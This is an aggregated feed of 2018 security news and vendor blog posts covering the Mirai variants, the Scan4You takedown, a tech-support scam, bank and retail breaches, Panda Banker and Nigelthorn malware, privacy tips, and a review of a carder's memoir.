  • The author put all of the high-possibility exploit code in Mirai
  • GPON was seemed used on separate pwn scheme by different script outside of the Mirai, but being used to infect Mirai.

MalwareMustDie researchers told me that they passed the identity of the author to the related country LEA. They explained to me that even if they made several reports to the authorities, law enforcement failed in preventing the diffusion of the malicious code. The experts showed me official report to LEA dated back January 2018, when they alerted authorities of propagations of new Mirai variants.

“the ID of the actor was passed to the related country LEA from our team that investigated result too since we published the Satori/Okiru variant a while ago, way before ARC CPU variant was spotted.” MMD told me.

“So by the release of the OWARI, SORA, and WICKED, this is what will happen if we let the malware actor running loose unarrested. More damage will be created and they just don’t know how to stop them self.”

Pierluigi Paganini

(Security Affairs – Wicked Mirai, botnet)

The post Updated – The new Wicked Mirai botnet leverages at least three new exploits appeared first on Security Affairs.

A Five-Year Journey: How Trend Micro Helped Bring Down Scan4You

Trend Micro has always had a close relationship with law enforcement around the globe, because we believe that only together can we make the world a safer place in which to exchange digital information. As the business of cybercrime continues to grow and evolve, so must our response. That’s why we were delighted to be able to help the FBI in a five-year, trans-national case which has seen two suspects brought to trial and the end the of notorious Counter AV (CAV) service Scan4You.

As detailed in our new report, the case highlights not only the strength of Trend Micro’s intelligence gathering and investigative support, but the often arduous nature of cybercrime policing.

A long and winding road

CAV services are a key part of the global cybercrime industry, allowing would-be attackers to test the effectiveness of their malware without the risk of being detected. Without them, attacks would not be nearly so successful. Scan4You was one of the most prolific out there, having gained the hard-won trust of countless black hats. But Trend Micro researchers had other ideas.

Back in 2012, while researching a private exploit kit called g01pack, we spotted some unusual activity. Just minutes before the exploits were used in the wild, somebody using IP addresses in Latvia checked whether Trend Micro’s web reputation system already blocked the URLs hosting the exploits. On closer inspection we noticed those IP addresses were not only checking g01pack’s exploit URLs but many others. We had just found Scan4You, an underground service which let cybercriminals check their latest malware against over 35 commercial AV engines.

Over the next five years we charted the rise of the service, sharing evidence with the FBI in 2014 which ultimately helped lead investigators to arrest and bring to trial two suspects. During that time, we found that site administrators ‘Borland’ and ‘Garrik’ had ties to numerous other cybercrime activities. These included Eva Pharmacy, one of the oldest operations around using spam and SEO tactics to sell prescription drugs, as well as campaigns using banking trojans and the sale of stolen credit card details.

The fight goes on

Boland and Garrik were arrested last year as part of an international policing operation, after which time we noticed all Scan4You scanning activity stopped. Even better, we’ve not seen a sizeable spike in users of rival CAV services such as VirusCheckMate, so it looks like the investigation has had a real impact on the cybercrime underground.

This is why Trend Micro has always worked closely with law enforcement. Protecting our customers is vital, but it’s also important to try and effect change by disrupting cybercrime itself. Since 2013, our 20 partnerships with the likes of the FBI, Interpol, Europol, the UK’s National Crime Agency (NCA) and more have certainly worked hard to do just that. In fact, a Scan4You reseller was recently sentenced to two years behind bars after a joint investigation between the NCA and Trend Micro.

It has been rewarding to see that Trend Micro’s cooperation with intelligence investigators helped to bring the Scan4You suspects to trial: it’s testament to the broad base of world-leading in-house skills and capabilities we have amassed over the past 30 years. Cybercrime is usually portrayed on TV or in the movies in a rather stereotyped, high-octane “good versus evil” battle. The truth, as we’ve seen, is rather more mundane, and cases take much longer than 90 minutes to crack.

So, let’s celebrate this success, but steel ourselves for more hard work to come. With close co-operation like this, police and security vendors like ourselves can make life increasingly uncomfortable for the bad guys. They’ve had it easy for far too long. So let’s take the fight to them as we continue on our mission to secure the connected world.

The post A Five-Year Journey: How Trend Micro Helped Bring Down Scan4You appeared first on .

Cybersecurity Threats in 2018: Cryptojacking, Ransomware and a Divided Zero-Day Market

Data from the first quarter of 2018 revealed that the cybersecurity threats landscape is changing. As noted by CSO Online, cryptojacking continues to gain ground: In the first quarter of 2018, 28 percent of companies reported crypto-mining malware, up from just 13 percent in Q4 2017.

According to Nasdaq, meanwhile, ransomware remains a critical threat. BlackRuby, SamSam and GandCrab all made an impact over the last three months, with GandCrab’s ransom demand marking the first time malicious actors asked for payment in Dash digital currency.

But there’s another story here: The growing division (and multiplication) of the zero-day market.

The Attack Surface Expands

As Computer Weekly reported, the total number of malware families grew by 25 percent last quarter while unique variants saw a 19 percent boost. In addition, cybercriminals are now taking the time to conduct reconnaissance on potential targets and leverage automation to maximize attack impact. The Nasdaq piece pointed to the Olympic Destroyer malware, which was specifically designed to interfere with the global sporting event in Pyeongchang this year.

Corporate attack surfaces are also expanding thanks to the uptake of Internet of Things (IoT) technologies. Three of the top 20 reported cybersecurity threats last quarter targeted these devices. Although 60 percent of all web traffic is now encrypted, this “represents a real challenge for traditional security technology that has no way of filtering encrypted traffic.” So it’s no surprise that zero-day threats haven’t received as much attention, even as the market for discovery and distribution evolves.

No Zero-Sum Game

According to Fortinet’s “Threat Landscape Report Q1 2018,” the zero-day market is maturing. While there were 214 zero-day threats discovered in all of 2017, 45 were found in Q1 2018 alone, affecting everything from popular content management systems (CMSs) to device makers and industry-leading operating system (OS) developers. Division of the market by “hat” — white-, gray- and black-hat IT experts — has produced three distinct zero-day streams:

  • White hat — This market supports bug bounty programs, which pay law-abiding security professionals to find new vulnerabilities, but secure disclosure and patching of these exploits is critical to limit accidental exposure.
  • Grey hatHere, zero-day “brokers” purchase bugs for customers. The caveat is that these customers are typically anonymous. The Fortinet report noted that it’s “possible that the buyer is a hostile nation-state, cybercriminal enterprise or otherwise maliciously inclined.”
  • Black hatFor black-hat actors, the goal is to both find and create new zero-day exploits for profit, and threat researchers have confirmed that “the creation and distribution of zero days by cybercriminals is on the rise.”

This triple-threat market adds up to a kind of multiplicative effect: Companies concerned about zero-day bugs invest more money into white-hat programs to find and eliminate them, while for-profit gray- and black-hat actors look to discover and create new bugs to continue the cycle.

Transformative Cybersecurity Threats

The Fortinet report emphasized that the rise of malware innovation, IoT risks, cryptojacking and zero-day threats “points to the continued transformation of cybercrime.” Specifically, companies need to do the math on zero-day exploits — division of outcomes, combined with multiplying interest, makes this a market to watch in 2018.

The post Cybersecurity Threats in 2018: Cryptojacking, Ransomware and a Divided Zero-Day Market appeared first on Security Intelligence.

Fake Malwarebytes helpline scammer caught in the act

An estimated one in every 10 American adults lost money in a cyber scam in the past 12 months, according to a report released by the FTC earlier in the month. On average, each scam victim lost $430, totaling about $9.5 billion overall.

To put this in perspective, that’s over 22 million Americans scammed for $26 million a day, more than $1 million an hour, $18,000 per second.

No one is immune, and now more than ever there is a need to be vigilant. Being taken by a scam can ruin lives or damage the reputation of legitimate companies. No one is excluded—not Amazon, Dell, Malwarebytes, or you.

In the example below, we’ll show how scammers Blue Eye Ventures, LCC, tried to imitate Malwarebytes in order to trick people out of money. Now, more than ever, it’s important to be vigilant in order to tell the good guys from the bad.

Malwarebytes helpline scam

Using a modern web design aesthetic, Blue Eye Ventures makes a reasonably good impression of a company looking to help its clients. They advertise that they are a Malwarebytes helpline. But they are not.

In order to catch these guys in the act, I called the toll-free number asking for help, telling them I wasn’t sure my Malwarebytes software was working properly. I allowed the technician to have access to my computer. He opened up my Malwarebytes software.

I’m sorry sir, this is fake software

The technician on the phone advised me that the (legitimate) Malwarebytes software I was running was fake. Now, I knew that it was not fake. I ran it minutes earlier and it worked perfectly.

Next thing I knew, he ran a tree command. Tree is a recursive directory listing program that produces a depth-indented listing of files. This is not a diagnose tool.

These are the results he produced:

At the bottom of the tree command, he typed “Security Breach” to scare me into believing that my computer was being hacked.

More scare tactics

He then checked my System Configuration:

The tech told me that all my software wasn’t running. “It’s stopped.” This was to scare me into believing that my system wasn’t working. Again, he wasn’t using any tools to diagnose hacking or infections.

He then pulled up Resource Monitor:

The tech asked me, “Do you know what crss.exe means?” I told him I don’t, even though I do.

The csrss.exe file located in C:\Windows\System32 is a real file, and removing it will cause problems with your PC. If someone tells you it’s a virus, that’s a hoax.

Case in point, to further scare me into believing my computer was infected, the tech asked me to read the description he pulled up on Google about the csrss.exe file being a Trojan horse or virus.

The Google result pulls information from an unreliable and untrustworthy source. For example, the article linked here recommends users remove this “malware” from their Mac systems. Any file with .exe is a Windows executable.

Meanwhile, the scammer still hadn’t checked my system with any real tools to find problems. He was only there to scare me into purchasing his plans.

Do not purchase

Below are the plans he offered me, from one year of support for $200 to a lifetime plan for $700. I was instructed to pay Blue Eye Ventures, LLC, by check. Or I could use my credit card at Easy-installatio.com (phone number +120-3354649). This is a Canadian number—and Malwarebytes’ HQ is in the United States.

How do you think a real customer would feel? They purchased Malwarebytes and now they are being told that they purchased phony software, their computer is infected, and it’s going cost them hundreds of dollars to repair. Scammers are not only ruining the reputation of legitimate companies, but they are ripping customers off in the process.

At Malwarebytes, we are always working to expose fraud and educate consumers. We will never sell phony software. We will never charge you hundreds of dollars to fix your computer. And we will teach you how to spot the companies who do.

The post Fake Malwarebytes helpline scammer caught in the act appeared first on Malwarebytes Labs.

Phishers increasingly targeting cloud storage and SaaS

The Anti-Phishing Working Group (APWG) has been tracking notable increases in phishing campaigns that target SAAS/webmail providers, as well as increased attacks on financial / banking targets and cloud storage and file-sharing sites. But banks remain the most popular targets, with phishers stealing customers’ online banking credentials. APWG member MarkMonitor detected phishing attacks targeting 454 organizations in the fourth quarter of 2017, and 60 percent of those organizations were financial institutions. The total number of … More

The post Phishers increasingly targeting cloud storage and SaaS appeared first on Help Net Security.

Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks

The head of the Mexican central bank, Alejandro Diaz de Leon announced this week that hackers were involved in shadowy transfers of between $18 million and $20 million.

Mexican central bank is the last victim of the SWIFT hackers, officials at the bank confirmed this week that hackers hit the payments system and stole millions of dollars from domestic banks.

The attack was discovered in late April and presents many similarities with past attacks against the SWIFT systems.

The Mexican central bank did not disclose the name of the banks that were hit by the cyber attack and did not detail the overall amount of money that crooks have stolen.

According to Alejandro Diaz de Leon, head of Mexico’s central bank, crooks were able to complete illicit transactions of $18 million to $20 million.

“Central bank Governor Alejandro Diaz de Leon said on Monday that the country had seen an unprecedented attack on payment system connections and that he hoped that measures being taken would stop future incidents.” reported the Reuters.

“A source close to the government’s investigation said more than 300 million had been siphoned out of banks, but it was not clear how much had subsequently been taken out in cash withdrawals.”

Mexican central bank cyberheist

According to reports, Mexico’s central following the latest cyber attacks has created a cybersecurity division, and it has instituted a one-day waiting period on electronic funds transfers of more than $2,500.

“Perhaps, some financial institutions perceived the attacks in Bangladesh as something very distant,” said Alejandro Diaz de Leon who believes that some Mexican banks may not have invested in sufficient security measures.

“But criminals look for vulnerability and once they see it they are going to exploit it.”

Mexican depositors won’t be affected, but the overall losses for the local banks could be greater than initially thought.

Pierluigi Paganini

(Security Affairs – Mexican central bank, SWIFT)

The post Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks appeared first on Security Affairs.

Ransomware-as-a-Service (RaaS): How It Works

Ransomware isn’t a new threat to the cyber world. Its origins go back many years now. Over time, this threat has become only more vicious and harmful. While people were trying to deal with this cyber threat, cybercriminals moved one step further by offering ransomware-as-a-service (RaaS). Under this service, cybercriminals provide a compact malicious kit […]… Read More

The post Ransomware-as-a-Service (RaaS): How It Works appeared first on The State of Security.

The State of Security: Ransomware-as-a-Service (RaaS): How It Works

Ransomware isn’t a new threat to the cyber world. Its origins go back many years now. Over time, this threat has become only more vicious and harmful. While people were trying to deal with this cyber threat, cybercriminals moved one step further by offering ransomware-as-a-service (RaaS). Under this service, cybercriminals provide a compact malicious kit […]… Read More

The post Ransomware-as-a-Service (RaaS): How It Works appeared first on The State of Security.



The State of Security

McAfee Blogs: Get Your Online Privacy Under Control

Online privacy: too often managing this aspect of our digital lives gets shuffled to the bottom of our ‘to-do’ lists. The recent Facebook Cambridge Analytica drama made many of us rethink what private information we are sharing online. But many of us just don’t know what to do to fix it.

This week is Privacy Awareness Week – a great opportunity to check-in and see how we can do better. A recent survey conducted by McAfee shows that most Aussies (54%) are more concerned about their online privacy than five years ago. This is encouraging! However, a whopping 83% of us do not believe that protecting our internet-connected devices is essential to managing our privacy online. Oh dear!! ☹

The survey also showed that 23% of Aussies do not change default passwords when we purchase new devices and that only 35% of us know how to properly check if our connected home appliances or devices are secured. Clearly we still have work to do, people! We have a disconnect on our hands. Most of us realise we need to do something to manage our privacy but don’t realise that protecting our devices is a big part of the solution. You can’t have one without the other!!!

Online Privacy Made Easier

So, I’m going to make it nice and easy for you. I have compiled a list of the steps you need to take to get your online privacy under control. And yes, it may take you a few hours to get on top of it but it’s so worth it. If your privacy is compromised, your identity can be easily stolen. Which could affect you financially as well as undermine your reputation. Let’s get to it – here’s what you need to do:

 1. Protect Your Devices

  • Use comprehensive security software such as McAfee® Total Protection. You know it will guard you against viruses and threats. But do you realise it will also direct you away from dangerous downloads and risky websites – where privacy can easily come unstuck!
  • McAfee® Total Protection will also protect your smartphone and tablet, and can back up your important files.

 2. Manage Your Passwords

  • Ensure all your online accounts and all your devices have a separate, unique password. Ideally, it should have a combination of lower and upper case letters, numbers and special characters. I love using a nonsensical, crazy sentence.

 3. Think Before You Download Apps

  • Never download apps from unknown sources. They may be designed to mine your personal information. Always read reviews to see if anyone has had a problem and check out the app’s fine print before you download.
  • Review the apps that you have signed up to with Facebook. As you would be aware from the recent Cambridge Analytica situation, Facebook provides some of these apps with user’s private information including name, location, email or even friends list.
    So, please review these apps, people. Not sure where to start? Go to Settings > Apps > Logged in with Facebook and remove anything that doesn’t absolutely need access to your Facebook profile. You will still have to contact the app developer to ensure they have deleted the data they already have gathered on you.

 4. Lock Down Your Home Wi-Fi

  • To prevent hackers accessing your fleet of IoT devices at home (including your virtual assistant or your lighting or security systems), secure your home Wi-Fi with a complex password. All device passwords need to have their default passwords changed as well.
  • McAfee’s Secure Home Platform – available soon on D-Link – can secure devices through your internet router to ensure every internet-connected device in your house is safe. How good is that???

 5. Stay On Top Of Software Updates

  • Check all your devices to ensure your software (operating systems, apps) is up-to-date.
  • Out-of-date software often means there is a security vulnerability that makes it so much easier for a cybercriminal to access your device and online life.
  • Why not schedule updates so this happens automatically?

 6. Be Wary Using Wi-Fi Outside Home Or Work

  • Avoid using public or unsecured Wi-Fi, especially when entering personal information online, as it can leave you open to all sorts of nasty attacks.
  • Use a Virtual Private Network (VPN) such as McAfee® Safe Connect to encrypt connections and keep your data secure when sharing online.

 7. Multi-Factor Authentication

And don’t forget about your kids! Teaching them the importance of proactively managing their online privacy is essential. As parents, we need to help our kids develop a toolkit of skills and knowledge, so they can prepare themselves for life’s challenges. So please share this with them – you’ll be doing them a big favour.

Alex x

The post Get Your Online Privacy Under Control appeared first on McAfee Blogs.



McAfee Blogs

Get Your Online Privacy Under Control

Online privacy: too often managing this aspect of our digital lives gets shuffled to the bottom of our ‘to-do’ lists. The recent Facebook Cambridge Analytica drama made many of us rethink what private information we are sharing online. But many of us just don’t know what to do to fix it.

This week is Privacy Awareness Week – a great opportunity to check-in and see how we can do better. A recent survey conducted by McAfee shows that most Aussies (54%) are more concerned about their online privacy than five years ago. This is encouraging! However, a whopping 83% of us do not believe that protecting our internet-connected devices is essential to managing our privacy online. Oh dear!! ☹

The survey also showed that 23% of Aussies do not change default passwords when we purchase new devices and that only 35% of us know how to properly check if our connected home appliances or devices are secured. Clearly we still have work to do, people! We have a disconnect on our hands. Most of us realise we need to do something to manage our privacy but don’t realise that protecting our devices is a big part of the solution. You can’t have one without the other!!!

Online Privacy Made Easier

So, I’m going to make it nice and easy for you. I have compiled a list of the steps you need to take to get your online privacy under control. And yes, it may take you a few hours to get on top of it but it’s so worth it. If your privacy is compromised, your identity can be easily stolen. Which could affect you financially as well as undermine your reputation. Let’s get to it – here’s what you need to do:

 1. Protect Your Devices

  • Use comprehensive security software such as McAfee® Total Protection. You know it will guard you against viruses and threats. But do you realise it will also direct you away from dangerous downloads and risky websites – where privacy can easily come unstuck!
  • McAfee® Total Protection will also protect your smartphone and tablet, and can back up your important files.

 2. Manage Your Passwords

  • Ensure all your online accounts and all your devices have a separate, unique password. Ideally, it should have a combination of lower and upper case letters, numbers and special characters. I love using a nonsensical, crazy sentence.

 3. Think Before You Download Apps

  • Never download apps from unknown sources. They may be designed to mine your personal information. Always read reviews to see if anyone has had a problem and check out the app’s fine print before you download.
  • Review the apps that you have signed up to with Facebook. As you would be aware from the recent Cambridge Analytica situation, Facebook provides some of these apps with user’s private information including name, location, email or even friends list.
    So, please review these apps, people. Not sure where to start? Go to Settings > Apps > Logged in with Facebook and remove anything that doesn’t absolutely need access to your Facebook profile. You will still have to contact the app developer to ensure they have deleted the data they already have gathered on you.

 4. Lock Down Your Home Wi-Fi

  • To prevent hackers accessing your fleet of IoT devices at home (including your virtual assistant or your lighting or security systems), secure your home Wi-Fi with a complex password. All device passwords need to have their default passwords changed as well.
  • McAfee’s Secure Home Platform – available soon on D-Link – can secure devices through your internet router to ensure every internet-connected device in your house is safe. How good is that???

 5. Stay On Top Of Software Updates

  • Check all your devices to ensure your software (operating systems, apps) is up-to-date.
  • Out-of-date software often means there is a security vulnerability that makes it so much easier for a cybercriminal to access your device and online life.
  • Why not schedule updates so this happens automatically?

 6. Be Wary Using Wi-Fi Outside Home Or Work

  • Avoid using public or unsecured Wi-Fi, especially when entering personal information online, as it can leave you open to all sorts of nasty attacks.
  • Use a Virtual Private Network (VPN) such as McAfee® Safe Connect to encrypt connections and keep your data secure when sharing online.

 7. Multi-Factor Authentication

And don’t forget about your kids! Teaching them the importance of proactively managing their online privacy is essential. As parents, we need to help our kids develop a toolkit of skills and knowledge, so they can prepare themselves for life’s challenges. So please share this with them – you’ll be doing them a big favour.

Alex x

The post Get Your Online Privacy Under Control appeared first on McAfee Blogs.

Rail Europe North America hit by payment card data breach

Rail Europe North America (RENA) notifies customers of a security breach, crooks compromised its website with a malware used to siphon payment card data.

The website allows users to buy European train tickets, according to the company the data breach lasted at least three months (between November 29, 2017 and February 16, 2018), the incident exposed also customers’ payment card data.

“Rail Europe North America Inc. (“RENA” or “we”) is writing to let you, as a customer of RENA, know about a recent data security incident that may have involved your credit card or debit card information and other personal information” reads the notice sent by the company to its customers.

“On February 16, 2018, as a result of a query from one of our banks, we discovered that beginning on November 29, 2017, through February 16, 2018, unauthorized persons gained unauthorized access to our ecommerce websites’ IT platform. Upon discovery that this malicious intrusion may have compromised users’ personal information, we immediately cut off from the Internet all compromised servers on February 16, 2018, and engaged information security experts to assist with forensic analysis, system restoration and security hardening”

According to the notice of data breach, hackers accessed registered users’ personal information including name, gender, delivery address, invoicing address, telephone number, email address, credit/debit card number, expiration date and CVV of customers, and, in some cases, username and password.

Rail Europe North America hack

The security breach was discovered after a bank inquiry informed the organization of an attack.

“In this case, however, the hackers were able to affect the front end of the Rail Europe website with ‘skimming’ malware, meaning customers gave payment and other information directly to the hackers through the website,” said Comparitech privacy advocate Paul Bischoff. “While the details haven’t been fully disclosed, the fact that this went on for three months shows a clear lack of security by Rail Europe.”

RENA replaced and rebuilt all compromised systems from known safe code, it also removed any potentially untrusted components. The IT staff changed passwords on all systems and applications, improved security controls and renewed digital certificates.

“RENA has also provided notice to the credit card brands and our credit/debit card transaction processors.” continues the notice.
“In addition, we are offering identity theft protection services through ID Experts®, the data breach and recovery services expert, to provide you with MyIDCare™. MyIDCare services include: 12 months of Credit and CyberScan monitoring, a $1,000,000 insurance reimbursement policy, exclusive educational materials and fully managed id theft recovery services.”

Pierluigi Paganini

(Security Affairs – Rail Europe North America, data breach)

The post Rail Europe North America hit by payment card data breach appeared first on Security Affairs.

The FBI’s 10 Most-Wanted Black-Hat Hackers – #5, #4 and #3

This week in Tripwire’s countdown of the FBI’s 10 most-wanted black-hat hackers, we name three hackers bound together in digital crime: Wen Xinyu, Huang Zhenyu and Sun Kailiang. The suspects made headlines in May 2014 when the United States Department of Justice indicted five suspected Chinese nationals for allegedly committing economic and cyber espionage against […]… Read More

The post The FBI’s 10 Most-Wanted Black-Hat Hackers – #5, #4 and #3 appeared first on The State of Security.

6 Best Practices to Avoid Leaks in 2018

One of the most dangerous threats to your business in 2018 is a data leak. Hackers can sell your information on the black market or simply destroy it. This could ruin your business overnight if you are not careful. So, you should use the best practices below to ensure you avoid leaks in 2018. Phishing […]… Read More

The post 6 Best Practices to Avoid Leaks in 2018 appeared first on The State of Security.

PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media

 

Security firm F5 detailed recently discovered campaigns leveraging the Panda Banker malware to target financial institution, the largest one aimed the banks in the US.

Researchers at security firm F5 recently detected several campaigns leveraging the Panda Banker malware to target financial institution, the largest one aimed the banks in the US.

In March, security researchers at Arbor Networks discovered a threat actor targeting financial institutions in Japan using the latest variant of the Panda Banker banking malware (aka Zeus Panda, PandaBot).

Panda Banker was first spotted in 2016 by Fox-IT, it borrows code from the Zeus banking Trojan and is sold as a kit on underground forums, In November 2017, threat actors behind the Zeus Panda banking Trojan leveraged black Search Engine Optimization (SEO) to propose malicious links in the search results. Crooks were focused on financial-related keyword queries.

The main feature of the Panda Banker is the stealing of credentials and account numbers, it is able to steal money from victims by implementing “man in the browser” attack.

According to F5, the malware continues to target Japanese institutions and it is also targeting users in the United States, Canada, and Latin America.

“We analyzed four campaigns that were active between February and May of 2018. The three May campaigns are still active at the time of this writing. Two of the four campaigns are acting from the same botnet version but have different targets and different command and control (C&C) servers.” reads the analysis published by F5.

“Panda is still primarily focused on targeting global financial services, but following the worldwide cryptocurrency hype, it has expanded its targets to online cryptocurrency exchanges and brokerage services. Social media, search, email, and adult sites are also being targeted by Panda.”

Experts observed a spike in the activity associated with the malware in February when the malicious code was used to target financial services and cryptocurrency sites in Italy with screenshots rather than webinjects. With this technique, the attackers are able to spy on user interaction at cryptocurrency accounts.

“The Panda configuration we analyzed from February was marked as botnet “onore2.” This campaign leverage the same attack techniques as previously described, and it is able to keylog popular web browsers and VNC in order to hijack user interaction session and steal personal information.” states the analysis.

Panda-banker-by-industry

In May, the experts monitored three different Panda Banker campaigns each focused on different countries.

One of them, tracked by F5 as botnet “2.6.8,” had targets in 8 industries in North America, most of the targets (78%) are US financial organizations.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” says F5.

Experts discovered that the same botnet 2.6.8 is also targeting Japanese financials as well.

Comparison of the two botnet configurations reveals that when Zeus.Panda is targeting Japan, the authors removed the Content Security Policy (CSP) headers: remove_csp  – 1 : The CSP header is a security standard for preventing cross-site scripting (XSS), clickjacking and other code injection attacks that could execute malicious code from an otherwise trusted site.

This last campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, and Google.com, Facebook, Twitter, and a couple of two sites.

The third campaign aimed at financial institutions in Latin America, most of them in Argentina, Columbia, and Ecuador, The same campaign also targeted social media, search, email, entertainment, and tech provider as the other attacks.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.

Pierluigi Paganini

(Security Affairs – Panda Banker, malware)

The post PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media appeared first on Security Affairs.

Nigelthorn malware infected over 100,000 systems abusing Chrome extensions

The Nigelthorn malware has already infected over 100,000 systems in 100 countries by abusing a Google Chrome extension called Nigelify.

A new strain of malware, dubbed Nigelthorn malware because it abuses a Google Chrome extension called Nigelify, has already infected over 100,000 systems in 100 countries, most of them in the Philippines, Venezuela, and Ecuador (Over 75%).

The new malware family is capable of credential theft, cryptomining, click fraud, and other malicious activities.

According to the experts, the threat actor behind this campaign has been active since at least March 2018.

The Nigelthorn malware is spreading through links on Facebook, victims are redirected to a fake YouTube page that asks them to download and install a Chrome extension to play the video. Once the victims accepted the installation, the malicious extension will be added to their browser.

“Radware has dubbed the malware “Nigelthorn” since the original Nigelify application replaces pictures to “Nigel Thornberry” and is responsible for a large portion of the observed infections.” reads the analysis published by Radware.

“The malware redirects victims to a fake YouTube page and asks the user to install a Chrome extension to play the video.”

The malware was specifically developed to target both Windows and Linux machines using the Chrome browser.

When a victim clicks on “Add Extension” is redirected to a Bitly URL from which they will be redirected to Facebook in the attempt to provide the credentials for his account.

In order to bypass Google Application validation tools, the threat actors used copycat versions of legitimate extensions and injected a short, obfuscated malicious script into them.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” reads the analysis.

After the malicious extension is installed, a JavaScript is executed to start the attack by downloading the malware configuration from the command and control (C&C) server, after which a set of requests is deployed.

The Nigelthorn malware is able to steal Facebook login credentials and Instagram cookies. The malware also redirects users to a Facebook API to generate an access token that is then sent to the Command and Control servers.

The malware propagated by using the stolen credentials, it sends the malicious link to the victim’s network either via messages in Facebook Messenger, or via a new post that includes tags for up to 50 contacts.

The Nigelthorn malware also downloads a cryptomining tool to the victim’s computer.

“The attackers are using a publicly available browser-mining tool to get the infected machines to start mining cryptocurrencies.” states Radware. “The JavaScript code is downloaded from external sites that the group controls and contains the mining pool. Radware observed that in the last several days the group was trying to mine three different coins (Monero, Bytecoin and Electroneum) that are all based on the “CryptoNight” algorithm that allows mining via any CPU.”

The malicious code uses numerous techniques to gain persistence on the infected system, such as closing the extensions tab if the user attempts to access it, or downloading URI Regex from the C&C and blocking users from accessing Facebook and Chrome cleanup tools or from making edits, deleting posts, and posting comments.

Experts also described a YouTube fraud, the YouTube plugin is downloaded and executed, after which the malware attempts to access the URI “/php3/youtube.php” on the C&C to receive commands to watch, like, or comment on a video, or to subscribe to the page. These actions are likely an attempt to receive payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” concludes Radware.

Pierluigi Paganini

(Security Affairs – Nigelthorn malware, Facebook)

The post Nigelthorn malware infected over 100,000 systems abusing Chrome extensions appeared first on Security Affairs.

Chili’s Restaurants Hit by Payment Card Breach

People who recently paid with their credit or debit card at a Chili’s restaurant may have had their information stolen by cybercriminals, according to Dallas-based Brinker International.

Brinker, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries, issued a notice shortly after the data breach was discovered on May 11.

read more

Security Affairs newsletter Round 162 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      European Central Bank announced a framework for cyber attack simulation on financial firms
·      Google announces the open-source Asylo framework for confidential computing
·      New ZooPark APT targets Android users in Middle East since 2015
·      A new report sheds the lights on state-sponsored Chinese APTs under Winnti umbrella
·      Chrome freezes PC running Windows OS after Windows 10 April update
·      SynAck ransomware Employs Many Novel Techniques to Avoid Detection
·      Experts released an unofficial patch for Zero-Days in Dasan GPON home routers
·      Hackers continue to hack Drupal installs to install backdoors and inject cryptocurrency malware
·      Reading the 2017 Internet Crime Complaint Center (IC3) report
·      Secret Conversation – Twitter is testing End-to-End Encryption for direct messages
·      UPDATED – Critical RCE vulnerability found in over a million GPON Home Routers
·      Adobe fixed a Critical Code Execution issue in Flash Player
·      Are you using Python module ‘SSH Decorator? Newer versions include a backdoor
·      baseStriker attack technique allow to bypass Microsoft Office 365 anti-phishing filter
·      May 2018 Android Security Bulletin includes additional Meltdown fix
·      May 2018 Patch Tuesday: Microsoft fixes 2 zero-day flaws reportedly exploited by APT group
·      Signal disappearing messages can be recovered by the macOS client
·      Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack
·      Lenovo releases updates to fix Secure Boot flaw in servers and other issues
·      Misinterpretation of Intel docs is the root cause for the CVE-2018-8897 flaw in Hypervisors and OSs
·      The source code of the TreasureHunter PoS Malware leaked online
·      Allanite threat actor focused on critical infrastructure is targeting electric utilities and ICS networks
·      Mining passwords from dozens of public Trello boards
·      Tech giant Telstra warns cloud customers theyre at risk of hack due to a SNAFU
·      Throwhammer, the new Rowhammer attack to remotely hack systems over the LAN
·      Google addresses critical security vulnerabilities in Chrome 66
·      iVideon Russian-based video surveillance solution leaked data, hundreds of thousands of records exposed
·      Wannacry outbreak anniversary: the EternalBlue exploit even more popular now

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 162 – News of the week appeared first on Security Affairs.

How to Steal a Million: The Memoirs of a Russian Hacker

As a University researcher specializing in cybercrime, I've had the opportunity to watch the Russian carding market closely and write about it frequently on my blog "Cybercrime & Doing Time."  Sometimes this leads to interactions with the various criminals that I have written about, which was the case with Sergey.  I was surprised last January to be contacted and to learn that he had completed a ten year prison sentence and had written a book.   I have to say, I wasn't expecting much.  This was actually the third time a cybercriminal had tried to get my interest in a book they had written, and the first two were both horrible and self-promotional.  I agreed to read his first English draft, which he sent me in January 2017.

I was absolutely hooked from page 1.  As I have told dozens of friends since then, his story-telling vehicle is quite good.  The book starts with him already in prison, and in order to teach the reader about carding and cybercrime, a lawyer visits him periodically in prison, providing the perfect foil  needed to explain key concepts to the uninitiated, such as interrupting one of Sergey's stories to ask "Wait.  What is a white card?"
My copy of the book!

As someone who has studied cybercrime for more than 20 years, I was probably more excited than the average reader will be to see so many names and criminal forums and card shops that I recognized -- CarderPlanet, and card shop runners such as Vladislav Khorokhorin AKA BadB, Roman Vega AKA Boa, and data breach and hacking specialists like Albert Gonzalez and Vladimir Drinkman who served as the source of the cards that they were all selling.  These and many of the other characters in this book appeared regularly in this blog.  (A list is at the bottom of this article)

Whether these names are familiar to the reader or not, one can't help but be drawn into this story of intrigue, friendship, and deception as Pavlovich and his friends detect and respond to the various security techniques that shopkeepers, card issuers, and the law enforcement world are using to try to stop them.  Sergey shows how a criminal can rise quickly in the Russian cybercrime world by the face-to-face networking that a $100,000 per month income can provide, jet-setting the world with his fellow criminals and using business air travel, penthouse hotel suites, cocaine and women to loosen the lips of his peers so he can learn their secrets., but he also shows how quickly these business relationships can shatter in the face of law enforcement pressure.

